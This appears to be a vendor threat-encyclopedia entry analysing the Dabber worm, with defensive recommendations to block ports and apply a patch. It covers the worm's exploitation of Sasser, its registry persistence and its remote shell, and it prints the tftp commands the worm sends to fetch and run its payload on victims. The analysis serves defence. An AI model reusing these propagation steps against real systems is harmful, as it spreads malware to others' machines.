W32/Dabber.A!worm

description-logoAnalysis


Specifics
This 32-bit virus has a packed file size of 29,696 bytes. This virus attacks systems already infected with the Sasser virus. The Dabber virus exploits a vulnerability in the FTP server component of Sasser. The exploit is based on code that overwrites a structured exception handler (SEH) pointer. This virus also runs a TFTP server in order to serve itself to target systems.


Load At Windows Startup
If this virus is run, it will copy itself to the Windows folder as "package.exe". The virus will have a related Mutex named "sas4dab" - if this Mutex already exists, the virus assumes it has infected the system and will not run. The virus will register itself to load at each Windows startup -

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
sassfix = undefinedWindowsundefined\package.exe


Search For Sasser
The virus will begin scanning random IP addresses on a destination TCP port 5554. Systems which respond are then targets for Dabber - Dabber will send an SEH pointer exploit to the target in order to gain access. Once the target is compromised, Dabber initiates a remote shell on TCP port 8967. Dabber then sends in instructions to the target to request a copy of Dabber from the source system using tftp in this format -

tftp -i (source IP)
GET hello.all package.exe
package.exe
exit

The above instruction execute "package.exe" after receiving it. Dabber also attempts to copy itself to the target system into this hard-coded path -

c:\Documents and Settings\All Users\Start Menu\Programs\Startup\package.exe


Remote Access Port
Dabber will bind with TCP port 9898 only as a listening port. When a source system infects a target system, it will send a connection attempt to TCP port 9898 as a method to confirm and verify that the target is infected.
Other Virus Cleanup Routine
Dabber will remove references to other viruses by deleting known registry keys associated with those viruses. Dabber removes these key values -

Window
Video Process
TempCom
SkynetRevenge
MapiDrv
BagleAV
System Updater Service
soundcontrl
WinMsrv32
drvddll.exe
navapsrc.exe
skynetave.exe
Generic Host Service
Windows Drive Compatibility
windows
Microsoft Update
Drvddll.exe
Drvddll_exe
drvsys
drvsys.exe
ssgrate
ssgrate.exe
lsasss
lsasss.exe
avserve2.exe
avvserrve32
avserve
Video
Taskmon
Gremlin

from these registry hive locations -

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Additionally Dabber deletes this registry key -

HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
(Default)


recommended-action-logoRecommended Action

  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
  • Using the FortiGate manager, block external to internal traffic using UDP port 69 and TCP ports 5554, 8967 and 9898
  • For Windows XP users, implement use of Personal Firewall - this feature automatically blocks unsolicited inbound traffic and would protect against this Internet worm
  • Ensure affected systems are updated with the latest Microsoft security patches, and specifically the update which addresses this vulnerability in MS04-011

Telemetry logoTelemetry

Detection Availability

FortiGate
Extended
FortiClient
FortiMail
FortiSandbox
FortiWeb
Web Application Firewall
FortiIsolator
FortiDeceptor
FortiEDR

Version Updates

Date Version Detail
2023-01-17 90.09734
2022-05-21 90.02492